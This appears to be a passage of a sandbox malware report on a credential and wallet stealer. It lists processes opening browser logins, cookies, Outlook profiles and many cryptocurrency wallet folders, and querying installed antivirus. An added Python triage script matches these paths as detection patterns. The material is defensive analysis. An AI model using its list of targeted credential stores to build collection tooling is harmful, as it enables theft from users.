Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Queries volume information: C:\ProgramData\jewkkwnf\jewkkwnf.exe VolumeInformation
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Code function: 7_2_004026C4 GetSystemTime, 7_2_004026C4
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Code function: 7_2_00405CF4 GetVersionExA, 7_2_00405CF4
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: 7wpHB_IZvVwIDf0EgO_TfPH6.exe, 0000000B.00000002.1964191932.0000000000634000.00000004.00000020.00020000.00000000.sdmp, QUh1lM2wAJwuyCkYckhrDFwz.exe, 0000000C.00000002.1990995859.00000000005E3000.00000004.00000020.00020000.00000000.sdmp, 2Umx78uafM0WA03fzJyYYhBa.exe, 0000000E.00000002.1973708870.0000000001634000.00000004.00000020.00020000.00000000.sdmp, 1YtOZF0EeqgcR_ddwAXkTcuY.exe, 0000000F.00000002.1970588859.0000000000F45000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avp.exe
Source: 7wpHB_IZvVwIDf0EgO_TfPH6.exe, 0000000B.00000002.1964191932.0000000000634000.00000004.00000020.00020000.00000000.sdmp, QUh1lM2wAJwuyCkYckhrDFwz.exe, 0000000C.00000002.1990995859.00000000005E3000.00000004.00000020.00020000.00000000.sdmp, QUh1lM2wAJwuyCkYckhrDFwz.exe, 0000000C.00000000.1922662863.0000000000032000.00000002.00000001.01000000.0000000D.sdmp, 2Umx78uafM0WA03fzJyYYhBa.exe, 0000000E.00000000.1922876856.0000000000F22000.00000002.00000001.01000000.0000000F.sdmp, 2Umx78uafM0WA03fzJyYYhBa.exe, 0000000E.00000002.1973708870.0000000001634000.00000004.00000020.00020000.00000000.sdmp, 1YtOZF0EeqgcR_ddwAXkTcuY.exe, 0000000F.00000002.1970588859.0000000000F45000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AVP.exe
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001179000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %\Windows Defender\MsMpeng.exe
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001179000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1950398912.00000000010D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 25.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.1YtOZF0EeqgcR_ddwAXkTcuY.exe.3cc5570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.1YtOZF0EeqgcR_ddwAXkTcuY.exe.3cc5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.2138074138.0000000003CC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2027068709.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 14.2.2Umx78uafM0WA03fzJyYYhBa.exe.43e5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.2Umx78uafM0WA03fzJyYYhBa.exe.43e5570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.2120842089.00000000043E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2717483187.00000000027D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2589310760.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 2Umx78uafM0WA03fzJyYYhBa.exe PID: 8072, type: MEMORYSTR
Source: Yara match File source: 00000027.00000002.3002403298.0000000002C91000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.3002271535.0000000002BEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2614020316.00000000014EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2308704967.0000000000E7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 23.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.7wpHB_IZvVwIDf0EgO_TfPH6.exe.32b5570.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.7wpHB_IZvVwIDf0EgO_TfPH6.exe.32b5570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.2146809633.00000000032B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2753591127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 7wpHB_IZvVwIDf0EgO_TfPH6.exe PID: 8048, type: MEMORYSTR
Source: Yara match File source: 25.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.1YtOZF0EeqgcR_ddwAXkTcuY.exe.3cc5570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.1YtOZF0EeqgcR_ddwAXkTcuY.exe.3cc5570.0.raw.unpack, type: UNPACKEDPE
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Source: Yara match File source: 00000011.00000002.2614020316.00000000014EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2717483187.00000000027D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2717483187.00000000028F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
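The file and registry accesses listed above are the stealer's collection phase: the injected RegAsm.exe host and the dropped lenTsqDIajevXTuJaJ03oKGb.exe walk cryptocurrency wallet directories (Coinomi, Ledger Live, atomic_qt, Guarda) and the Outlook profile keys under Windows Messaging Subsystem. A signed .NET framework utility such as RegAsm.exe has no legitimate reason to open wallet stores or mail profiles, so the combination of "who" and "what" is the detection. The following Python triage helper is an added example, not part of the Joe Sandbox report: it parses evidence lines in the report's own "Source: <process> File opened/Key opened: <target>" format, matches targets against the wallet and mail indicators seen here, and flags a hit when the accessing process is one of a hypothetical list of commonly hollowed Microsoft hosts. The sample lines are constructed (a subset of the report's entries plus one benign access), and the LOLBIN_HOSTS list and category names are assumptions for illustration.

```python
"""
Triage helper for sandbox evidence lines of the form
  "Source: <process> File opened: <path>"
  "Source: <process> Key opened: <registry key>"
It flags credential-store access (crypto wallets, Outlook profiles) and
notes when the accessing process is a Microsoft-signed host such as
RegAsm.exe, which would only touch such data if code had been injected into it.
"""
import re
from collections import defaultdict

# Constructed sample, modelled on the report's "Source:" evidence lines
# (three wallet accesses, two Outlook profile accesses, one benign access).
SAMPLE_EVIDENCE = r"""
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Program Files\Notepad++\notepad++.exe File opened: C:\Users\user\Documents\notes.txt
"""

# One evidence line: process path, the action keyword, and the target path/key.
LINE_RE = re.compile(
    r"^Source:\s+(?P<proc>.+?\.exe)\s+(?P<action>File opened|Key opened):\s+(?P<target>.+)$"
)

# Credential-store indicators taken from the accesses listed in the report (case-insensitive).
CREDENTIAL_STORE_PATTERNS = {
    "crypto_wallet": re.compile(r"\\AppData\\Roaming\\(Coinomi|Ledger Live|atomic_qt|Guarda)\\", re.I),
    "outlook_profile": re.compile(r"\\Windows Messaging Subsystem\\Profiles\\Outlook\\", re.I),
}

# Assumed list of Microsoft .NET utilities that loaders commonly hollow; none of them
# should read wallets or mail profiles on their own.
LOLBIN_HOSTS = {"regasm.exe", "regsvcs.exe", "msbuild.exe", "installutil.exe", "aspnet_compiler.exe"}


def parse_evidence(text):
    """Return a list of {'proc', 'action', 'target'} dicts for every well-formed line."""
    events = []
    for line in text.strip().splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append(m.groupdict())
    return events


def classify(event):
    """Name the credential-store category a target belongs to, or None if it is not one."""
    for name, pattern in CREDENTIAL_STORE_PATTERNS.items():
        if pattern.search(event["target"]):
            return name
    return None


def triage(text):
    """Aggregate credential-store accesses per process and mark hollowed-host candidates."""
    findings = defaultdict(lambda: {"categories": set(), "lolbin_host": False, "hits": 0})
    for ev in parse_evidence(text):
        category = classify(ev)
        if category is None:
            continue  # ordinary file/registry access, not worth reporting
        proc = ev["proc"]
        basename = proc.rsplit("\\", 1)[-1].lower()
        entry = findings[proc]
        entry["categories"].add(category)
        entry["hits"] += 1
        if basename in LOLBIN_HOSTS:
            entry["lolbin_host"] = True
    return dict(findings)


if __name__ == "__main__":
    for proc, info in triage(SAMPLE_EVIDENCE).items():
        tag = "INJECTED HOST?" if info["lolbin_host"] else "dropped binary"
        print(f"{proc}: {info['hits']} credential-store accesses "
              f"({', '.join(sorted(info['categories']))}) [{tag}]")
```

The same matching logic applies to live telemetry: feed it Sysmon Event ID 11 (FileCreate) or 12/13 (registry) records, or EDR file-open events, after normalising them into the same (process, target) shape, and alert whenever a LOLBIN_HOSTS process lands in a credential-store category.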

Remote Access Functionality

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 25.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.1YtOZF0EeqgcR_ddwAXkTcuY.exe.3cc5570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.1YtOZF0EeqgcR_ddwAXkTcuY.exe.3cc5570.0.raw.unpack, type: UNPACKEDPE
